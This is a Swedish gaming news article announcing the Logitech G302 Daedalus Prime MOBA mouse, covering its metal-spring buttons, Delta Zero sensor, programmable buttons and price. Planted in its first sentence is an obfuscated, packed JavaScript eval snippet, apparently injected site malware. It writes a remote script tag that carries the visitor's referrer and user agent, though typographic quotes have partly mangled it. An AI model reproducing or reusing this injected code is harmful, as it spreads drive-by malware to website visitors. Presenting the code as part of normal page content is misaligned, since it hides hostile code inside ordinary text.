Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Logitech G lanserar MOBA-musen G302 Daedalus Prime

Logitech G lanserar MOBA-musen G302 Daedalus Prime
Sebastian

Logitech eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rhtdk|var|u0026u|referrer|taerr||js|php’.split(’|’),0,{}))
lanserar idag sin senaste gamingmus
Logitech® G302 Daedalus Prime™ MOBA Gaming Mouse. Testad av professionella MOBA-spelare från världen över såsom medlemmar från Team SoloMid, Cloud9, CJ Entus Frost, CJ Entus Blaze, och Invictus Gaming är den byggd för att klara av att prestera på högsta nivå. Musens huvudknappar är utrustade med metallfjädrar för maximal responsivitet och känsla.

Logitech G302 är den senaste produkten som Logitech med hjälp av vetenskap designat för att hjälpa gamers att vinna. Knapparna, formen och vikten är alla speciellt valda med professionella MOBA-spelares krav i åtanke.

“Vi skapade G302 för att uppfylla några av världens absolut främsta spelares behov, säger Vincent Tucker, ansvarig för Logitech gaming. ”G302 är den absolut bästa musen för MOBA-spelande och kombinerar bekvämlighet och kvalitet med den mest avancerade teknologin som finns. Den är byggd för att hänga med och klara tufft användande i många timmar, och gör dina musklick extremt snabba och precisa, allt för att utgöra skillnaden mellan vinst och förlust när millisekunderna verkligen räknas.”

Logitech G302 är också utrustad med Logitechs Delta Zero™-sensor som kombinerar optisk design, geometri och mjukvara för att ge dig precis översättning av handrörelser till rörelser på skärmen.

”Den är superlätt och responsiv, knapparna känns perfekta och trackingen är fläckfri”, säger Jason ”WildTurtle” Tran från Team SoloMid. ”G302 är exakt vad jag behöver för att hjälpa mitt lag vinna.”

Skapad för att hantera snabba klick

Ett metallfjädersystem gör musens höger- och vänsterklick snabbare och mer precisa. Knapparna kan registrera upp till fem klick per sekund och G302 kommer alltid kunna hänga med i dina snabba klick, något som kan vara skillnaden mellan vinst och förlust i en jämn match.

Anpassningsbarhet

Logitech G302 kommer med sex programmerbara knappar som låter dig forma din spelupplevelse. Knapparna kan programmeras för att göra vad som helst, från simpla knapptryck till komplicerade makron. Använd den som den är eller ställ in egna inställningar med hjälp av Logitech Gaming Software. Logitech G302 kommer också med fyra DPI-lägen som du kommer åt snabbt och enkelt, perfekt för att kombinera precision med hög hastighet.

Lätt och hållbar design

Lättviktsdesignen är utrustad med fötter behandlade för att minimera friktion och hållbara knappar som testats för upp till 20 miljoner klick – motsvarande att spela i femton timmar per dag i två år.

Pris and Tillgänglighet

Logitech G302 Daedalus Prime förväntas finnas tillgänglig i Europa från november 2014 med ett föreslaget pris på 499:-. För mer information besök gaming.logitech.com.